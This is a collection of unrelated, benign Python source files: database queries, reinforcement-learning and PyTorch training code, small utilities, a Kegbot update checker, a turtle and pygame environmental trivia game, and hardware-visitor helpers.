self.requestTable.c.group_id == groupId),
self.requestTable.c.response_date == None))
now = datetime.now(UTC)
session = getSession()
session.execute(u, params={'responding_user_id': adminId,
'response_date': now,
'accepted': response})
mark_changed(session)
def current_requests(self, groupId, siteId):
s = self.requestTable.select(
order_by=sa.desc(self.requestTable.c.request_date))
s.append_whereclause(self.requestTable.c.group_id == groupId)
s.append_whereclause(self.requestTable.c.site_id == siteId)
s.append_whereclause(self.requestTable.c.response_date == None)
session = getSession()
r = session.execute(s)
retval = []
seen = set()
if r.rowcount >= 1:
for x in r:
if x['user_id'] not in seen:
seen.add(x['user_id'])
rd = {'request_id': x['request_id'],
'user_id': x['user_id'],
'request_date': x['request_date'],
'message': x['message']}
retval.append(rd)
return retval
def count_current_requests(self, groupId, siteId):
cols = [sa.func.count(self.requestTable.c.request_id)]
s = sa.select(cols)
s.append_whereclause(self.requestTable.c.group_id == groupId)
s.append_whereclause(self.requestTable.c.site_id == siteId)
s.append_whereclause(self.requestTable.c.response_date == None)
session = getSession()
r = session.execute(s)
retval = r.scalar()
if retval is None:
retval = 0
assert retval >= 0
return retval
|
StarcoderdataPython
|
1685592
|
"""
Python 3.9 starter program for learning Reinforcement Learning in Python
File name 00. start.py
Version: 0.1
Author: <NAME>
Date: 2021-12-19
We use one of OpenAI's test games, specifically the "MountainCar-v0" environment
"""
import gym  # OpenAI library with simple games
env = gym.make("MountainCar-v0")  # create the virtual environment (initialize the environment)
env.reset()  # for this gym, observations are returned from resets and steps.
print(env.action_space.n)  # for different environments we can ask how many actions / moves are possible
# In this case we can pass "3" actions. This means that when we step through the environment, we can pass 0,
# 1 or 2 as our "action" for each step. Each time we do this, the environment will return
# the new state, the reward, whether the environment is done / finished, and any additional info
# that some envs may provide.
# 0 means push left, 1 means stay in place, and 2 means push right.
print(env.reset())  # you will get something like [-0.4826636  0.], which is the initial observation state.
done = False
while not done:
    action = 2  # always go right! 0 means push left, 1 means stay in place, 2 means push right.
    new_state, reward, done, _ = env.step(action)
env.render()
# As you can see, even though the car is constantly asked to go right, it simply does not have the power
# to make it. Instead, we need to build up momentum to reach the flag. To do that, we need to
# move back and forth to gain momentum. We could program a function that performs this task for us,
# or we can use Q-learning to solve it!
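# --- Illustrative sketch (added for clarity, not part of the original tutorial file) ---
# A minimal setup for tabular Q-learning on this environment: discretize the continuous
# observation into buckets and index a Q-table with them. The bucket count (20) and the
# random initialization range are arbitrary choices here.
import numpy as np

DISCRETE_OS_SIZE = [20] * len(env.observation_space.high)
discrete_os_win_size = (env.observation_space.high - env.observation_space.low) / DISCRETE_OS_SIZE

def get_discrete_state(state):
    # map a continuous observation to integer bucket indices
    discrete_state = (state - env.observation_space.low) / discrete_os_win_size
    return tuple(discrete_state.astype(int))

q_table = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE + [env.action_space.n]))
print(q_table[get_discrete_state(env.reset())])  # Q-values for the 3 actions in the start state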
|
StarcoderdataPython
|
1905515
|
import pandas as pd
from db_pool.mysqlhelper import MySqLHelper
from matplotlib import pyplot as plt
db = MySqLHelper()
mertics1_sql = "SELECT pharmacy_order.store_id, SUM(orderdetail.final_total) AS 'October 2021 Sales' FROM orderdetail INNER JOIN pharmacy_order ON pharmacy_order.order_id=orderdetail.order_id INNER JOIN pharmacy ON pharmacy_order.store_id=pharmacy.store_id WHERE orderdetail.order_time >= 1633046400 & orderdetail.order_time <= 1635724799 GROUP BY pharmacy_order.store_id;"
mertics1_sql_result = list(db.selectall(sql=mertics1_sql))
for i in range(len(mertics1_sql_result)):
mertics1_sql_result[i] = list(mertics1_sql_result[i])
mertics1_sql_result[i][1] = round(mertics1_sql_result[i][1], 2)
df = pd.DataFrame(mertics1_sql_result, columns =['store_number', 'Sales'])
plt.figure(figsize=(6, 6))
explode = (0, 0, 0, 0, 0)
plt.title("Sales of Pharmacies in October 2021 Grouped by Store Number")
colors = ("SkyBlue", "SlateGrey", "SteelBlue", "Silver", "cornflowerblue")
labels = 'Store 1', 'Store 2', 'Store 3', 'Store 4', 'Store 5'
plt.pie(x=df.Sales, labels=labels,explode=explode, colors=colors, autopct="%.0f%%", counterclock=False, shadow=False)
plt.show()
mertics2_sql = "SELECT order_medicine.medicine_sku, SUM(order_medicine.amount) AS total_sale_quantity FROM order_medicine INNER JOIN medicine ON medicine.medicine_sku=order_medicine.medicine_sku GROUP BY medicine.medicine_sku ORDER BY total_sale_quantity DESC;"
mertics2_sql_result = db.selectall(sql=mertics2_sql)
print(mertics2_sql_result)
|
StarcoderdataPython
|
5026474
|
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='darktree',
version='0.1.0',
description='Yosys JSON Netlist Hierarchical Viewer',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/nturley/darktree',
author='<NAME>',
author_email='<EMAIL>',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Digital Hardware Engineers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
keywords='netlist yosys hierarchy',
packages=find_packages(exclude=['doc', 'test']),
python_requires='>=3.0',
install_requires=['QDarkStyle', 'PySide2'],
package_data={
'darktree': ['main.ui'],
},
entry_points={
'console_scripts': [
'darktree=darktree:main.main',
],
},
)
|
StarcoderdataPython
|
1755413
|
for _ in range(int(input())):
m,s = map(int,input().split())
print(m//s)
|
StarcoderdataPython
|
4823609
|
import click
import pygments
import pygments.formatters
from suricata_prettifier.beautify import beautify_file
from suricata_prettifier.lexer import SuricataLexer
@click.command(context_settings=dict(
ignore_unknown_options=True,
))
@click.option('-f', '--formatter', default='terminal')
@click.argument('input', type=click.File('r'), default='-')
@click.argument('output', type=click.File('w'), default='-')
@click.argument('formatter_options', nargs=-1, type=click.UNPROCESSED)
def prettify(input, output, formatter, formatter_options=()):
lexer = SuricataLexer()
default_options = dict(
full=True,
style='vim',
prestyles='white-space: pre-wrap;',
)
options = {
**default_options,
**dict(option.split('=', 1) for option in formatter_options),
}
formatter = pygments.formatters.get_formatter_by_name(formatter, **dict(options))
source = beautify_file(input)
pygments.highlight(source, lexer, formatter, output)
if __name__ == '__main__':
prettify()
|
StarcoderdataPython
|
6534607
|
from __future__ import print_function
import statemachine as fsm
class TrafficLight(fsm.Machine):
initial_state = 'red'
count = 0
@fsm.after_transition('red', 'green')
def chime(self):
print('GO GO GO')
self.count += 1
@fsm.after_transition('*', 'red')
def apply_brakes(self):
self.stopped = True
@fsm.event
def cycle(self):
yield 'red', 'green'
yield 'green', 'yellow'
yield 'yellow', 'red'
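# Illustrative usage (assumption, not from the original module: the exact driving API of the
# local `statemachine` helper is inferred from the decorators above):
#   light = TrafficLight()   # starts in 'red' (initial_state)
#   light.cycle()            # red -> green, runs chime() and increments count
#   light.cycle()            # green -> yellow
#   light.cycle()            # yellow -> red, runs apply_brakes()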
|
StarcoderdataPython
|
6410952
|
from abc import ABC, abstractmethod
from typing import List, Union
import torch
from torch.optim.optimizer import Optimizer
from parseridge.corpus.corpus import Corpus
from parseridge.corpus.training_data import ConLLDataset
from parseridge.parser.modules.data_parallel import Module
from parseridge.parser.training.callbacks.base_callback import Callback
from parseridge.parser.training.callbacks.handler import CallbackHandler
from parseridge.parser.training.callbacks.model_training_callback import (
ModelTrainingCallback,
)
from parseridge.parser.training.hyperparameters import Hyperparameters
from parseridge.utils.logger import LoggerMixin
class Trainer(LoggerMixin, ABC):
def __init__(
self, model: Module, optimizer: Optimizer, callbacks: List[Callback] = None
):
self.model = model
self.optimizer = optimizer
self.callback_handler = CallbackHandler(
callbacks=callbacks or [], model=self.model, optimizer=self.optimizer
)
self.callback_handler.register_callback(ModelTrainingCallback())
self.last_epoch = 0
def register_callbacks(self, callbacks: List[Callback]) -> None:
for callback in callbacks:
self.callback_handler.register_callback(callback)
@abstractmethod
def fit(
self,
epochs: int,
training_data: Union[Corpus, ConLLDataset],
hyper_parameters: Hyperparameters = None,
**kwargs,
) -> None:
pass
def fit_one_cycle(
self,
training_data: Union[Corpus, ConLLDataset],
hyper_parameters: Hyperparameters = None,
**kwargs,
) -> None:
return self.fit(
epochs=1,
training_data=training_data,
hyper_parameters=hyper_parameters,
**kwargs,
)
def learn(self, loss: torch.Tensor) -> None:
self.callback_handler.on_loss_begin(loss=loss)
# Compute the gradients
self.callback_handler.on_backward_begin()
loss.backward()
self.callback_handler.on_backward_end()
# Update the weights
self.optimizer.step()
self.callback_handler.on_step_end()
# Clear all previous gradients
self.optimizer.zero_grad()
|
StarcoderdataPython
|
6554109
|
<reponame>codecakes/algorithms_monk
#!/bin/python
"""
Your local library needs your help! Given the expected and actual return dates for a library book, create a program that calculates the fine (if any). The fee structure is as follows:
If the book is returned on or before the expected return date, no fine will be charged (i.e. fine = 0).
If the book is returned after the expected return day but still within the same calendar month and year as the expected return date, fine = 15 Hackos x (number of days late).
If the book is returned after the expected return month but still within the same calendar year as the expected return date, fine = 500 Hackos x (number of months late).
If the book is returned after the calendar year in which it was expected, there is a fixed fine of 10000 Hackos.
Input Format
The first line contains 3 space-separated integers denoting the respective day, month, and year on which the book was actually returned.
The second line contains 3 space-separated integers denoting the respective day, month, and year on which the book was expected to be returned (due date).
Constraints
Output Format
Print a single integer denoting the library fine for the book received as input.
Sample Input
9 6 2015
6 6 2015
Sample Output
45
"""
def isLeap(yy):
    if yy%4 != 0: return False
    if yy%100 != 0: return True
    if yy%400 != 0: return False
    return True
def month_days(m, y):
return 28 if (m==2 and not isLeap(y)) \
else (29 if (m ==2 and isLeap(y)) \
else (31 if (m%2 == 1 and m<8) \
else (31 if m%2 == 0 and 12>=m>7 \
else (30 if m%2 == 1 and 12>=m>7 \
else 30))))
def fine_due(d1,m1,y1,d2,m2,y2):
# d1,m1,y1 - actual
# d2,m2,y2 - due
# tot_days = m_count = 0
if y1<y2:
return 0
if y1>y2:
# m1_days = month_days(m1, y1)
# m2_days = month_days(m2, y2) - d2 - 1
# yr_days = 365 if not isLeap(y2) else 366
# m_count += 1 if m2_days%month_days(m2, y2) == 0 else 0
#for m in xrange(m2+1, 13):
# tot_days += month_days(m, y2)
# m_count += 1
# tot_days += m2_days
#
# for m in xrange(1, m1):
# tot_days += month_days(m, y1)
# m_count += 1
# tot_days += d1
# print tot_days
#return 10000 if tot_days > yr_days else 500 * m_count
return 10000
if m1<m2:
return 0
if m1>m2:
return 500 * (m1-m2)
if d1<d2:
return 0
if d1>d2:
return 15 * (d1-d2)
return 0
d1,m1,y1 = raw_input().strip().split(' ')
d1,m1,y1 = [int(d1),int(m1),int(y1)]
d2,m2,y2 = raw_input().strip().split(' ')
d2,m2,y2 = [int(d2),int(m2),int(y2)]
print fine_due(d1,m1,y1,d2,m2,y2)
|
StarcoderdataPython
|
394720
|
<filename>practicas/voice_call/t2.py
import pyaudio
p = pyaudio.PyAudio()
for i in range(p.get_device_count()):#list all available audio devices
dev = p.get_device_info_by_index(i)
print((i,dev['name'],dev['maxInputChannels']))
|
StarcoderdataPython
|
1864844
|
<filename>LIVE/labs/tmp.py
alist = [
"351",
"222",
"143"
]
def f0(x): return x[0]
def f1(x): return x[1]
def f2(x): return x[2]
sort_by_index = [f0, f1, f2]
sorted_st = sorted(alist, key=sort_by_index[2])
print( sorted_st )
# print( student_tuples.sort(reverse=False))
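# Equivalent, more idiomatic alternatives (added note, not in the original lab file):
#   sorted(alist, key=lambda x: x[2])
#   from operator import itemgetter; sorted(alist, key=itemgetter(2))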
|
StarcoderdataPython
|
1822949
|
<reponame>theshiv303/kegbot-server
"""Checks a central server for updates."""
from builtins import str
from django.core.cache import cache
from django.utils import timezone
from pykeg.core import models
from pykeg.core import util
from pykeg.core.tasks import core_checkin_task
from pykeg.core.util import SuppressTaskErrors
import datetime
import logging
import os
import requests
FIELD_REG_ID = "reg_id"
FIELD_PRODUCT = "product"
FIELD_VERSION = "version"
FIELD_INTERVAL_MILLIS = "interval_millis"
FIELD_UPDATE_AVAILABLE = "update_available"
FIELD_UPDATE_REQUIRED = "update_required"
FIELD_UPDATE_TITLE = "update_title"
FIELD_UPDATE_URL = "update_url"
FIELD_NEWS = "news"
PRODUCT = "kegbot-server"
CHECKIN_URL = os.getenv("CHECKIN_URL", None) or "https://kegbotcheckin.appspot.com/checkin"
CHECKIN_INTERVAL = datetime.timedelta(hours=12)
KEY_LAST_CHECKIN_TIME = "checkin:last_checkin_time"
KEY_LAST_CHECKIN_RESPONSE = "checkin:last_checkin_response"
LOGGER = logging.getLogger("checkin")
logging.getLogger("requests").setLevel(logging.WARNING)
class CheckinError(Exception):
"""Base exception."""
def get_last_checkin():
"""Returns tuple of (time, data), or (None, None) if not available."""
return cache.get(KEY_LAST_CHECKIN_TIME), cache.get(KEY_LAST_CHECKIN_RESPONSE)
def set_last_checkin(when, response_data=None):
"""Sets last checkin date and time."""
cache.set(KEY_LAST_CHECKIN_TIME, when, timeout=None)
cache.set(KEY_LAST_CHECKIN_RESPONSE, response_data, timeout=None)
def schedule_checkin(force=False):
"""Schedules a checkin if needed and allowed.
Args
force: if True, ignore last checkin time.
Returns
True if a checkin was scheduled.
"""
kbsite = models.KegbotSite.get()
if not kbsite.check_for_updates:
LOGGER.debug("schedule_checkin: not scheduling: checkin disabled")
return False
last_checkin_time, last_checkin_data = get_last_checkin()
now = timezone.now()
if not last_checkin_time or (now - last_checkin_time) > CHECKIN_INTERVAL or force:
with SuppressTaskErrors(LOGGER):
LOGGER.info("schedule_checkin: scheduling checkin")
core_checkin_task.delay()
return True
return False
def checkin(url=CHECKIN_URL, product=PRODUCT, timeout=None, quiet=False):
"""Issue a single checkin to the checkin server.
No-op if kbsite.check_for_updates is False.
Returns
A checkin response dictionary, or None if checkin is disabled.
Raises
ValueError: On malformed reponse.
requests.RequestException: On error talking to server.
"""
kbsite = models.KegbotSite.get()
if not kbsite.check_for_updates:
LOGGER.debug("Upgrade check is disabled")
return
site = models.KegbotSite.get()
reg_id = site.registration_id
headers = {
"User-Agent": util.get_user_agent(),
}
payload = {
FIELD_PRODUCT: product,
FIELD_REG_ID: reg_id,
FIELD_VERSION: util.get_version(),
}
try:
LOGGER.debug("Checking in, url=%s reg_id=%s" % (url, reg_id))
result = requests.post(url, data=payload, headers=headers, timeout=timeout).json()
new_reg_id = result.get(FIELD_REG_ID)
if new_reg_id != reg_id:
LOGGER.debug("Updating reg_id=%s" % new_reg_id)
site.registration_id = new_reg_id
site.save()
LOGGER.debug("Checkin result: %s" % str(result))
if not quiet:
LOGGER.info("Checkin complete, reg_id=%s" % (reg_id,))
set_last_checkin(timezone.now(), result)
return result
except (ValueError, requests.RequestException) as e:
if not quiet:
LOGGER.warning("Checkin error: %s" % str(e))
raise CheckinError(e)
|
StarcoderdataPython
|
8068956
|
width = 2448
height = 2048
# `images` is assumed to be an iterable of images defined earlier in this script.
# enumerate() gives each image its own index, so every annotation file gets a
# distinct name instead of repeatedly overwriting "0.xml".
for i, image in enumerate(images):
xml_file = open(str(i)+".xml","w+")
xml_file.write("<annotation><filename>"+str(i)+".png</filename>\
<size><width>"+str(width)+"</width><height>"+str(height)+"</height>\
<depth>3</depth></size>\
<object><pose>Frontal</pose>\
<truncated>0</truncated>\
<difficult>0</difficult></object></annotation>")
xml_file.close()
|
StarcoderdataPython
|
9790156
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
# ----------------------------------------------------------------------------
from spack import *
class RCa(RPackage):
"""Simple, Multiple and Joint Correspondence Analysis
Computation and visualization of simple, multiple and joint
correspondence analysis."""
homepage = "http://www.carme-n.org/?sec=ca"
url = "https://cloud.r-project.org/src/contrib/ca_0.71.1.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/ca"
version('0.71.1', sha256='040c2fc94c356075f116cc7cd880530b3c9e02206c0035182c03a525ee99b424')
depends_on('[email protected]:', type=('build', 'run'))
|
StarcoderdataPython
|
5195969
|
<gh_stars>0
from json import load
from os import path, getcwd
from feature.feature_defintions.Histogram import Histogram
from feature.feature_defintions.AlexNet import AlexNet
from feature.feature_defintions.VGGNet import VGGNet
from feature.feature_defintions.ResNet50 import ResNet50
from feature.feature_defintions.Colourization import Colourization
from feature.feature_defintions.VAE import VAE
from feature.feature_defintions.MyModel import MyModel
from feature.feature_tests.test_functions import *
# TODO:
# Logging
# Timing script
# Output multiple CSV files for 1 run (i.e. models trained to different
# epochs)
# Constants
HISTOGRAM_BINS = 256
# Parse feature config JSON file. Config structure:
#
# {
# "input_path_base": "path/to/input/data/",
# "input_name": "data_directory_name/",
# "output_path_base": "path/to/output/",
# "output_name": "name_of_index.csv",
# "feature_path": "path/to/model/", (leave blank for histogram features)
# "feature_name": "name_of_feature"
# }
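# A concrete feature_params.json might look like this (hypothetical values,
# shown for illustration only; the reader below also expects a "layer" key):
#
# {
#     "input_path_base": "/data/",
#     "input_name": "images/",
#     "output_path_base": "/data/output/",
#     "output_name": "index.csv",
#     "feature_path": "/data/models/",
#     "feature_name": "resnet50",
#     "layer": "avgpool"
# }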
def feature_json_read():
config_path = path.join(getcwd(), 'feature_params.json')
assert(path.isfile(config_path)), "{} does not exist".format(config_path)
print("Feature config file path: ", config_path)
with open(config_path) as f:
config_file = load(f)
input_path = config_file['input_path_base']
input_name = config_file['input_name']
output_path = config_file['output_path_base']
output_name = config_file['output_name']
feature_path = config_file['feature_path']
feature_name = config_file['feature_name']
layer = config_file['layer']
config_dict = dict()
config_dict['input'] = input_path + input_name
config_dict['output'] = output_path + output_name
config_dict['feature_name'] = feature_name
config_dict['feature_path'] = feature_path
config_dict['layer'] = layer
return config_dict
# Instantiate object for requested feature
def feature_object_create(config):
feature_name = config['feature_name']
print(feature_name + " selected")
if 'histogram' in feature_name:
_feature = Histogram(HISTOGRAM_BINS, config)
elif 'alex' in feature_name:
_feature = AlexNet(config)
elif 'vgg' in feature_name:
_feature = VGGNet(config)
elif 'resnet50' in feature_name:
_feature = ResNet50(config)
elif 'colourization' in feature_name:
_feature = Colourization(config)
elif 'vae' in feature_name:
_feature = VAE(config)
    else:
        # Unrecognised feature name: fall back to the generic wrapper model
        # instead of exiting, so the created object can still be returned.
        _feature = MyModel(config)
return _feature
# Feature index creation code entry point called from top level main function
def feature_driver_run():
# Read input JSON
config = feature_json_read()
test_config_dict(config)
# Instantiate feature object
feature_object = feature_object_create(config)
# test_histogram_object(feature_object)
# Apply get_feature() to each image
feature_object.index_create(feature=feature_object)
|
StarcoderdataPython
|
4959380
|
<reponame>heltonricardo/estudo-python
n = input('Type something: ')
print('The input type is {}'.format(type(n)))
print('Is it alphanumeric? ', n.isalnum())
print('Is it alphabetic? ', n.isalpha())
print('Is it decimal? ', n.isdecimal())
print('Is it a digit? ', n.isdigit())
print('Is it a valid identifier? ', n.isidentifier())
print('Is it lowercase? ', n.islower())
print('Is it numeric? ', n.isnumeric())
print('Is it printable? ', n.isprintable())
print('Is it whitespace? ', n.isspace())
print('Is it title-cased? ', n.istitle())
print('Is it uppercase? ', n.isupper())
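# Example: for the input "Python3" the checks above print True for isalnum(),
# isidentifier(), isprintable() and istitle(), and False for all the rest.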
|
StarcoderdataPython
|
8042824
|
<reponame>553269487/ConvLSTM-on-TIANCHI-CIKM-2017
from torch import nn
import torch.nn.functional as F
import torch
class activation():
def __init__(self, act_type, negative_slope=0.2, inplace=True):
super().__init__()
self._act_type = act_type
self.negative_slope = negative_slope
self.inplace = inplace
def __call__(self, input):
if self._act_type == 'leaky':
return F.leaky_relu(input, negative_slope=self.negative_slope, inplace=self.inplace)
elif self._act_type == 'relu':
return F.relu(input, inplace=self.inplace)
elif self._act_type == 'sigmoid':
return torch.sigmoid(input)
else:
raise NotImplementedError
class ED(nn.Module):
def __init__(self, encoder, decoder):
super().__init__()
self.encoder = encoder
self.decoder = decoder
def forward(self, input):
        state = self.encoder(input)   # encode the input sequence into a hidden state
        output = self.decoder(state)  # decode the hidden state into the output sequence
return output
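# Minimal usage sketch (encoder and decoder are assumed to be nn.Module
# instances defined elsewhere in this repo):
#   model = ED(encoder, decoder)
#   prediction = model(input_sequence)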
|
StarcoderdataPython
|
4997129
|
<gh_stars>0
#Hangman Trivia!!
#make variables for
#[questions]
#right_answer
#wrong_answers
#bad_pictures
#good_pictures
#name
#
#
#register all graphics and pictures
#ask user to input name
#welcome the user to <NAME>
#do the following 5 times
#ask user question
#show answers
#take answers
#if right
#add 1 good_picture to the drawing
#else
#add 1 bad_picture to the drawing
#if losses outnumber wins
#print you lose
#else (more wins than losses)
#print you win
#congratulate if user wins
#don't congratulate if user loses
import pygame
import turtle
pygame.mixer.pre_init(44100, 16, 2, 4096) #frequency, size, channels, buffersize
pygame.init() #turn all of pygame on.
# pictures
turtle.bgcolor("green")
screen = turtle.Screen()
screen.setup(1500, 1000)
turtle.register_shape("car.gif")
turtle.register_shape("cow.gif")
turtle.register_shape("electric car.gif")
turtle.register_shape("factory.gif")
turtle.register_shape("cow-farting.gif")
turtle.register_shape("fire.gif")
turtle.register_shape("flowers.gif")
turtle.register_shape("6 trash images.gif")
turtle.register_shape("recycling factory.gif")
turtle.register_shape("6 sea.gif")
car = turtle.clone ()
car.shape("car.gif")
car.penup()
car.hideturtle()
car.goto(-600, -200)
elec_car = turtle.clone()
elec_car.shape("electric car.gif")
elec_car.penup()
elec_car.hideturtle()
elec_car.goto(-600, -200)
car_s=pygame.mixer.Sound("Car Engine Sound Effect.wav")
cow = turtle.clone()
cow.shape("cow.gif")
cow.penup()
cow.hideturtle()
cow.goto(-300, -200)
cow_s=pygame.mixer.Sound("Moo! Sound Effect [COW].wav")
farting_cow = turtle.clone()
farting_cow.shape("cow-farting.gif")
farting_cow.penup()
farting_cow.hideturtle()
farting_cow.goto(-300, -200)
f_cow_s=pygame.mixer.Sound("Fart sound effect.wav")
factory = turtle.clone()
factory.shape("factory.gif")
factory.penup()
factory.hideturtle()
factory.goto(0, -200)
factory_s=pygame.mixer.Sound("factory.wav")
refactory = turtle.clone()
refactory.shape("recycling factory.gif")
refactory.penup()
refactory.hideturtle()
refactory.goto(0, -200)
fire = turtle.clone()
fire.shape("fire.gif")
fire.penup()
fire.hideturtle()
fire.goto(500, -200)
fire_s=pygame.mixer.Sound("FIRE SOUND EFFECT IN HIGH QUALITY.wav")
flowers = turtle.clone()
flowers.shape("flowers.gif")
flowers.penup()
flowers.hideturtle()
flowers.goto(400, -200)
flowers_s=pygame.mixer.Sound("Bird Sound Effect.wav")
sea = turtle.clone()
sea.shape("6 sea.gif")
sea.penup()
sea.hideturtle()
sea.goto(0, -400)
sea_s=pygame.mixer.Sound("OCEAN SOUND EFFECT [HD].wav")
trash = turtle.clone()
trash.shape("6 trash images.gif")
trash.penup()
trash.hideturtle()
trash.goto(0, -400)
null = turtle.clone()
null.penup()
null.hideturtle()
null.goto(1000,1000)
c_answer_s=pygame.mixer.Sound("Correct-answer.wav")
w_answer_s=pygame.mixer.Sound("Wrong-answer-sound-effect.wav")
# sounds
def car_s_f():
pygame.mixer.Sound.play(car_s)
def cow_s_f():
pygame.mixer.Sound.play(cow_s)
def f_cow_s_f():
pygame.mixer.Sound.play(f_cow_s)
def factory_s_f():
pygame.mixer.Sound.play(factory_s)
def flowers_s_f():
pygame.mixer.Sound.play(flowers_s)
def fire_s_f():
pygame.mixer.Sound.play(fire_s)
def sea_s_f():
pygame.mixer.Sound.play(sea_s)
# what the question has
class Question:
def __init__(self, prompt, answer, turtle_shape, bad_turtle, sound, b_sound):
self.prompt = prompt
self.answer = answer
self.turtle_shape = turtle_shape
self.bad_turtle = bad_turtle
self.sound=sound
self.b_sound=b_sound
def p_g_sound(self):
pygame.mixer.Sound.play(self.sound)
def p_b_sound(self):
pygame.mixer.Sound.play(self.b_sound)
#questions,options of answers, \n = linebreaker
question_prompts = [
"\nwhich country has the most pollution?\n(a) China\n(b) Brazil\n(c) United States\n(d) Indonesia\n",
"\nHow many years of oil is left in the world?\n(a) 101 years\n(b) 53 years\n(c) 20 years\n(d) 69 years\n",
"\nHow much oil is left in the world?\n(a) 6.003 trillion barrels\n(b) 3.775 trillion barrels\n(c) 0.804 trillion barrels\n(d) 1.688 trillion barrels\n",
"\nWho is the biggest oil producer in the world?\n(a) Saudi Arabia\n(b) USA\n(c) Russia\n(d) China\n",
"\nHow many years of gas are left in the world?\n(a)200 years\n(b) 86 years\n(c) 115 years\n(d)98 years\n",
"\nwhat is the easiest plastic code to recycle?\n(a) 3\n(b) 6\n(c) 7\n(d) 1\n",
"\nWhat is cutting of trees called?\n(a) hewing\n(b) cutzing\n(c) CTs\n(d) falling\n",
"\nWhat is the largest oil company in Canada?\n(a)Encana Corporation\(b)Suncor Energy\n(c)Husky Energy\n(d)Enbridge\n",
"\nWhat is the largest oil company in Canada?\n(a)water\n(b)sand\n(c)dust\n(d)stones\n",
"\nWhat is the top cause of air pollution?\n(a)Emission from Vehicles\n(b)Poisonous Gas\n(c)Combustion of Fossil Fuels\n(d)Pollution From AC\n",
#right answers
]
questions = [
Question(question_prompts[0], "a", refactory, factory, factory_s , factory_s),
Question(question_prompts[1], "b", elec_car, car, car_s, car_s),
Question(question_prompts[2], "d", cow, farting_cow, cow_s,f_cow_s),
Question(question_prompts[3], "a", flowers, fire, flowers_s, fire_s),
Question(question_prompts[4], "c", sea, trash,sea_s, sea_s),
Question(question_prompts[5], "d", null, null, c_answer_s, w_answer_s),
Question(question_prompts[6], "a", null, null, c_answer_s, w_answer_s),
Question(question_prompts[7], "b", null, null, c_answer_s, w_answer_s),
Question(question_prompts[8], "c", null, null, c_answer_s, w_answer_s),
Question(question_prompts[9], "b", null, null, c_answer_s, w_answer_s),
]
#Loop over the questions: check whether each answer is right or wrong, print the result, and show the matching picture and sound
def run_quiz(questions):
print("\n")
for question in questions:
answer = input(question.prompt)
if answer == question.answer:
print("the answer is correct!")
question.turtle_shape.showturtle()
pygame.mixer.music.stop()
question.p_g_sound()
else:
print("the answer is incorrect..")
print("the right answer is " + question.answer)
question.bad_turtle.showturtle()
pygame.mixer.music.stop()
question.p_b_sound()
run_quiz(questions)
|
StarcoderdataPython
|
3200371
|
from selia.views.create_views.manager_base import CreateManagerBase
class CreatePhysicalDeviceManager(CreateManagerBase):
manager_name = 'selia:create_physical_device'
def view_from_request(self):
if 'device' not in self.request.GET:
return 'selia:create_physical_device_select_device'
return 'selia:create_physical_device_create_form'
|
StarcoderdataPython
|
3558290
|
<reponame>kdr-s/clipboard-img-to-Y<filename>clipboard-img-to-Y.py
from PIL import ImageGrab, ImageChops, Image
from time import sleep
from ctypes import windll
import numpy as np
last_im = Image.new("RGB", (512, 512), (128, 128, 128))
Ctrl = 0x11
def isPressed(key):
return(bool(windll.user32.GetAsyncKeyState(key)&0x8000))
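# GetAsyncKeyState returns a value whose most significant bit (0x8000) is set
# while the key is currently held down, so the mask above tests "is this key
# pressed right now".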
while True:
im = ImageGrab.grabclipboard()
if isinstance(im, Image.Image):
im = im.convert('RGB')
        # Check whether the two images are identical
if ImageChops.difference(im, last_im).getbbox() != None:
last_im = im
if isPressed(Ctrl):
# lumi_im = im.convert("L")
array = np.asarray(im, dtype='float')
array = (array/255)**2.2
# array = array[:][:][0]*0.2126; array = array[:][:][1]*0.7152; array = array[:][:][2]*0.0722;
array = np.sum(array*np.array([[[0.2126,0.7152,0.0722]]]), axis=2)
array = (array**(1/2.2))*255
array = np.round(array).astype('uint8')
lumi_im = Image.fromarray(array)
lumi_im.show()
sleep(1)
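# Note: the conversion above approximates sRGB decoding with a 2.2 gamma,
# applies Rec.709 luma weights (0.2126, 0.7152, 0.0722) to get relative
# luminance, then re-encodes and rounds back to 8-bit before showing the
# grayscale image.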
|
StarcoderdataPython
|
8150249
|
from pygears.core.hier_node import HierVisitorBase
class HDLGearHierVisitor(HierVisitorBase):
def RTLGear(self, node):
gear = node.gear
if hasattr(self, gear.definition.__name__):
return getattr(self, gear.definition.__name__)(node)
def flow_visitor(cls):
def svgen_action(top, conf):
v = cls()
v.conf = conf
v.visit(top)
return top
return svgen_action
def is_gear_instance(node, definition):
return node.gear.definition is definition
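# Usage sketch (hypothetical visitor subclass; the names are illustrative only):
#   class CollectAdders(HDLGearHierVisitor):
#       def add(self, node):
#           ...  # called for every RTL gear whose definition is named `add`
#   pass_fn = flow_visitor(CollectAdders)  # -> callable(top, conf) that visits top and returns it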
|
StarcoderdataPython
|